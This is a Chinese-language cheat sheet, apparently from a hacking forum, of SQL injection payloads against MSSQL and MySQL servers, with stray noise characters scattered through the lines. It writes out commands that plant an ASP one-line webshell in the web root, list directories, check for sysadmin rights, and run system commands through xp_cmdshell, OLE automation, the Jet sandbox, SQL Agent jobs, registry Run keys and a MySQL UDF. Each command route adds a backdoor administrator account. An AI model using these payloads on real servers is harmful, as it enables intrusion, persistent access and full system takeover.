MSSQL语句导出一句话木马
( o" {' \: g% L. e: m首先确定网站的WEB路径9 I; J9 m& O; ]7 O( T* B" {
;create table pcguest(pc char(255));-- //建一个表用作插入一句话木马
1 u, S0 W# j0 f2 O
6 e4 ^3 y7 p2 T9 c5 s* V;insert into pcguest(pc) values ('%3c%25execute request(%22p%22)%25%3e');--
5 f* G1 l5 ?& p' B+ q//将一句话木马插入表中% f# K& z5 l8 _4 f
7 {7 M' M$ P2 w2 {! i8 \0 ~
;execute sp_makewebtask @outputfile='E:\Inetpub\wwwroot\PC.ASP',@query='select pc from pcguest';-- 7 h3 h$ l, \' k" j
//导出一个ASP文件
! ?1 q. F( ]* Y* U, G( r# @
/ V9 D% t" v( u5 ~8 l" V( C- B+ x+ z4 m6 r8 G' y" |1 W
关于MSSQL列目录0 d8 r% E4 y1 I6 X1 W! I6 _2 ~" W. y
;CREATE TABLE pctest(subdirectory VARCHAR(100),depth VARCHAR(100),[file] VARCHAR(100)) //建一个新表
8 O, I: N% X. Z; \6 OInsert pctest exec master..xp_dirtree "d:\app\",1,1 //用xp_dirtree列目录结果导入所建成的表% E: k; [2 X) {1 p K+ l: N0 E
2 ]7 k- u0 x/ }+ v! cand (select Count(1) from [pctest]) between 0 and 99 //判断表中字段数来知道有几个文夹和目录5 U( i' O& o( b
! u. I0 A5 P" A6 e
And (Select Top 1 len(Cast([file] as varchar(8000))+subdirectory) From (Select Top 2 [subdirectory],[file] From pctest ORDER BY [file],[subdirectory]) D ORDER BY [file] desc , [subdirectory] desc) between 0 and 20 //猜解第二个字段
9 @0 S; D7 @: q$ V' m# ?5 Z/ z d! m
And (Select Top 1 unicode(substring(Cast([file] as varchar(8000))+subdirectory,1,1)) From (Select Top 1 [subdirectory],[file] From pctest ORDER BY [file],[subdirectory]) D ORDER BY [file] desc , [subdirectory] desc) between 30 and 130 //逐一猜解字段名的每位字符7 p5 _2 X# }7 D" o. _! ^& t+ p& v
, _ w9 ^* r; [% D% O. W8 d
4 _5 p6 K- s. e, [5 o; V# b& G数据库版本和权限查看5 c0 L5 D" O/ I, I4 e
and 1=(select @@VERSION) //查看详细的数据库信息.
5 j9 [2 g8 F Sand 1=(SELECT IS_SRVROLEMEMBER('sysadmin'));-- //查看权限是不是SA
% W/ W+ L; N$ ^4 Land 1=(SELECT IS_MEMBER('db_owner'));-- //查看权限是不是DB_ONWER
) b7 \) k/ r: ]6 @4 ]
4 o0 ?2 s( ~9 c% h+ M; z( X: h- Q @: R3 ^$ n8 n
1.利用xp_cmdshell执行命令4 |* z1 T* W/ F9 o4 _. }
exec master..xp_cmdshell 'net user rfire 123456 /add'
. l* r; g# X$ B; Z2 I5 i& kexec master..xp_cmdshell 'net localgroup administrators rfire /add'
1 r- e9 ~8 ]% W/ g- |
) e4 h+ @" ^6 @3 ^4 `5 Q恢复xp_cmdshell存储过程 G3 A* s( Z' r5 ]$ h
Exec sp_addextendedproc xp_cmdshell ,@dllname ='xplog70.dll'
8 C9 r& E- N: S3 x8 t# O R( O5 N( q8 P$ t+ c, J+ b- v
9 p& E& G' A5 [% i* [/ c2.利用SP_OAcreate和SP_OAMETHOD执行命令
* X* X6 g6 Z8 d. R在wscript.shell组件存在的情况下以及xp_cmdshell和xplog70.dll都被删除的情况下
2 _% }6 q8 L/ A& LDECLARE @shell INT //建立一个@shell实体
6 Q) _9 t$ {7 q$ v- ~8 x" D2 dEXEC SP_OAcreate 'wscript.shell',@shell out //创建OLE对象的实例
2 Z9 i3 I6 K! [$ J% v5 mEXEC SP_OAMETHOD @shell,'run',null,'net user rfire 123456 /add' //调用@shell这个实例; I- o( }# D5 T; q% p W6 i0 y$ }1 @
0 w2 ?$ A/ E2 J
/ q- i# t* B" d8 o# h% g3.利用沙盒模式* Z# ?) j( h1 q/ d
先利用xp_regwrite(前提是要求xp_regwrite存在)改注册表,然后用OpenRowSet访问系统自身mdb文件,然后执行SQL语句。
: f S; b3 \- n1 _% ~- @3 v开启沙盒模式:# i0 U, `# z5 ?& J
EXEC master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE','SoftWare\Microsoft\Jet\4.0\Engine','SandBoxMode','REG_DWORD',0! @" V2 ]* P7 e
: B/ i1 S% p7 J4 I
执行命令:, b5 M0 i# J4 ?
Select * From OpenRowSet('Microsoft.Jet.OLEDB.4.0',';Database=c:\windows\system32\ias\ias.mdb','select shell("net user rfire 123456 /add")');
) T6 o$ W; Q4 p/ Q+ q6 C
. p" n/ H j" i7 k
$ P6 Q' i7 A1 k3 }8 {, g4.利用SQL代理执行命令0 e# h8 T/ Z D! n6 \ r
EXEC master.dbo.xp_servicecontrol 'start','SQLSERVERAGENT' //使用xp_servicecontrol启动SQLSERVERAGENT服务) k; T- M$ f5 u( n% }& O0 ~
3 K- V( W# B6 E$ h5 H/ r执行命令:
- E$ G6 v) v+ T6 _. `: @% kuse msdb exec sp_delete_job null,'x' //进入msdb数据库,删除x作业防止出错
* d; @# W( y8 @+ w' q1 l) A* W R' aexec sp_add_job 'x'/ g% s$ |+ {7 w+ n
exec sp_add_jobstep Null,'x',Null,'1','CMDEXEC','cmd /c net user rfire 123456 /add' //添加作业
! x% c5 Z' b4 ]# L1 Dexec sp_add_jobserver Null,'x',@@servername exec sp_add_job 'x' //启动这个作业' T, W" Z, u4 F, ]' `( ]' L8 t
) t$ i: s# D8 `/ c, G' _6 q$ \
. j' e+ X* m7 a6 i5.利用注册表项执行命令(用xp_regwrite将执行命令写入启动项)
! A/ M! ]# C% B. |( U& BEXEC master.dbo.xp_regwrite 'SOFTWARE\Microsoft\Windows\CurrentVersion\Run\','shell'.'REG_SZ','C:\windows\system32\cmd.exe /c net user rfire 123456 /add'
& Y0 _+ P8 q9 a" a3 I
* z5 ~5 `* {6 P: | P% S
- Z6 H- P; n6 a3 d+ J* x# M/ ?6.MYSQL的命令执行 `8 l. b4 U: d i, q0 K1 t/ c, n
MYSQL的UDF自定义函数提权(要求账号拥有insert和delete权限)
! R) m' h) b% l4 ]9 k, ~首先要在su.php下导出c:\windows\udf.dll/ i: Z( e7 ^4 d Q& A! ?4 `" Q2 r
导出后执行创建自定义函数命令:; v( |8 J% L, N
Create Function cmdshell returns string soname 'udf.dll'
: B" Z; N4 T+ a: X$ l执行命令1 N/ ?' ~' I+ f- p6 f$ O5 v
select cmdshell('net user rfire 123456 /add')
( P$ X* a" R9 u% {$ c执行后删除函数 drop function cmdshell: N* r* Y6 S9 l% |: j9 I
|